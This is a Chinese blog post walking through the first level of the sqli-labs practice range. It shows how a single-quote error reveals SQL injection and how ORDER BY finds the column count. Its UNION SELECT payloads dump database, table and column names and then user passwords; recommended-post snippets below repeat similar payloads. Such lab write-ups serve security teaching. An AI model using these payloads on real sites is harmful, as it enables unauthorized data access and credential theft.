sqli-libs less1(union 字符注入)

最新推荐文章于 2023-04-01 20:45:46 发布
最新推荐文章于 2023-04-01 20:45:46 发布
阅读量269 收藏 1
点赞数
分类专栏: SQL注入 文章标签: 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42728957/article/details/110946963
版权

打开后,提示输入id并赋值在这里插入图片描述

1、寻找注入点

输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞
在这里插入图片描述
在这里插入图片描述
根据报错信息,猜想输入参数的值被放到一对单引号之间。

猜测后台源码中存在类似于如下的数据库查询语句(可查看后台源码证实猜测):

SELECT * FROM users WHERE id='$id' LIMIT 0,1

2、order by 查询该数据表中的字段数量

输入?id=1’ order by 3 --+ 正常;
输入?id=1’ order by 4 --+ 报错,说明该数据表中字段数为3。

在这里插入图片描述
在这里插入图片描述
3、爆破数据库
测试出一共有几列数据之后,改变语句:?id=-1 union select 1,2,3 --+
语句解析:

  • id = -1 --联合查询后两个查询结构合并输出。但是这个结果只能显示第一个,因此需要让前一个查询结果为空值。
  • union --联合查询
  • select 1,2,3 – 利用1,2,3 测试出数据返回的数据在页面的位置
    可以看到只有2,3在页面出现,因此可以使用2,3这两个位置。
    构造字符串查询数据库名、表名、列名、字段信息。
    从information_schema中获取所有的数据库名:
?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+

在这里插入图片描述
从information_schema中获取security所有表名:

?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema='security') --+

在这里插入图片描述
从 information_schema中获取列

?id=-1' union select 1,(select group_concat(column_name)from information_schema.columns where table_name='users'),3 --+

在这里插入图片描述
查询所有用户名和密码
?id=-1’ union select 1,(select group_concat(username) from security.users ), (select group_concat(password) from security.users) --+
在这里插入图片描述
爆破成功!
知识点:
(1)在MySQL 5.0版本之后,MySQL默认在数据库中存放一个“information_schema”的数据库,在该库中,我们需要记住三个表名,分别是schemata、tables和colums。

  • schemata表存储该用户创建的所有数据库的库名,我们需要记住该表中记录数据库库名的字段名为schema_name。
  • tables表存储该用户创建的所有数据库的库名和表名,我们需要记住该表中记录数据库库名和表名的字段名分别为table_schema和table_name。
  • columns表存储该用户创建的所有数据库的库名、表名和字段名,我们需要记住该表中记录数据库库名、表名和字段名的字段名为table_schema、table_name 和column_name.
    (2)group_concat函数是典型的字符串连接函数。group_concat(table_name)表示把table_name字段的值打印在一行,逗号分隔(默认)。
    (3)–+中,“–”是SQL查询语句中的注释符,“+”在URL中表示空格。
橘子就酱
关注
专栏目录
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
Less-2 【数值型】
tubug的博客
05-20 427
到此闯关完成,闯关结束。
Sqli-labs靶场笔记2(Less-2~4 联合注入
m0_52233414的博客
04-01 193
sqli-labs的Less2到Less4三道题都可以用联合注入解决,所以放到一起来记录,联合注入的基本思路方法可以看我的上一篇,这里只针对题目来写。
sqli-labs靶场1-10关
Cobra的博客
04-05 363
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入) 一、手工UNION联合查询注入 1、输入?id=1’发现报错,输入?id=1’-- -(-- -为注释符),页面回显正常,说明是单引号闭合注入。 2、爆数据库名 ?id=-1' union select 1,2,database() -- - (得到“security”数据库) 3、爆表名 ?id=-1' union select 1...
SQL注入】Less-2错误型GET整型注入
Mitchell_Donovan的博客
03-30 308
Less-2错误型GET整型注入 什么是整形注入?可以理解位提交的URL参数为整数类型。 实验漏洞复现介绍 该实验与Less-1错误型GET单引号字符注入 区别在于,构建payload时去掉'单引号 1、爆开数据库 payload ?id=0 union select 1,2,database() --+ 2、爆开数据表 payload ?id=0 union select 1,group_concat(table_name),3 from information_schema.ta
LESS2(sql注入
qq_44598397的博客
03-14 929
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqil-labs sql注入 LESS2联合注入教程
m0_70787202的博客
03-19 178
less2联合注入教程
less知识点总结(一)
weixin_30590285的博客
06-21 142
1.unit 删除或更换单位。 参数: dimension: 带单位或不带单位的数字。 unit: (可选) 目标单位,如果省略此参数,则删除单位。 Seeconvertfor changing the unit without conversion. 案例:unit(5, px) 输出:5px 案例:unit(5em) 输出:5 2.ceil ...
sqli靶场通关之less2
sunxueer的博客
07-15 447
sqli靶场 less2 方法一:union联合查询 1. 求闭合字符 id=1 //无异常 id=1 and 1 =1 -- + //正确显示 id=1 and 1 =2 -- + //错误 说明有可能存在数字型SQL注入 2. 求列数 id=1 order by 3 -- + id=1 order by 4 -- + 说明有3列 3. 求显示位 id=-1 union select 1,2,3 -- + 4. 爆数据库名 id=1 and 1=2 union select 1,
sqli-labs靶场第二关
gou1791241251的博客
12-19 757
传入id=1查看页面回显 第一步:判断注入类型。如字符型,数值型 传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码 不传入单引号或双引号页面正常 第二步:判断表字段数 使用order by order by 3 时页面正常 order by 4时页面回显异常,所以有三个字段 第三步:使用联合查询获取数据库相关信息与查看页面回显位置 接下来查看数据库名和版本号 接下来通过mysql数据库中的information_schema数据中的tables表来查询所有
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1455
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入类型 输入1 and 1=1
Sqli-labs 基本注入篇 (Less1~22)
angry_program的博客
01-20 1878
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 基本注入篇对应labs的1~22关: 目录 Sqli-labs 基本注入篇 Less-1 单引号显错注入 一、手工注入 1. 判断字符型与整数型注入 2. 爆字段数 3. 爆库爆表爆字段 4. 取对应字段的值 二、sqlmap自动注入 1. 检测目标网站存在的注入漏洞类型 2....
Less2css error 终极解决方案
weixin_30633507的博客
05-16 246
使用sublime Text3 的时候,安装less2Css后,和很多人一样以为大功告成,开始要运行编译less文件,结果开始发现      于是乎开始搜索问题和解决方案,然后就有了下面的解决方案1   方案1:通过window path +less.js-windows 的方式(网上可以快速找到这种解决的方式)   注意:window 操作系统下,经常会看到编译l...
Sqli-Labs之less-2
ISNS的博客
02-05 972
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~
sublime text3 安装less2css
mmrsdym的专栏
02-02 4499
1.下载sublime text3 sublime text3下载地址:http://pan.baidu.com/s/1i3N22TR 解压下载包sublime text3,打开“” 2.打开sublime text之后,安装“Package Control” 找到 " Preferences——》Package Control ", 也可以用快捷键 Ctrl+Shift+P打
sqli-labs less-1
最新发布
08-07
"Less-1"是SQL注入实验室(sqli-labs.com)中的一个挑战任务,它是针对Web应用程序安全训练的一种常见练习,特别是针对SQL注入攻击的学习。在这个特定的实验中,用户通常需要通过提交恶意SQL查询来绕过网站的安全防护机制,比如输入验证不足的表单。 "Less-1"的目标可能是让你了解如何构造精心设计的SQL语句,它们既能利用系统提供的漏洞,又能避开简单的过滤规则,获取数据库中的信息。它旨在提升防御者对SQL注入攻击的认识,并教授基本的渗透测试技巧。 要完成这个挑战,你需要理解: 1. SQL的基本语法和结构。 2. Web应用服务器的工作原理和数据传递过程。 3. 输入验证在防止SQL注入中的作用以及其局限性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值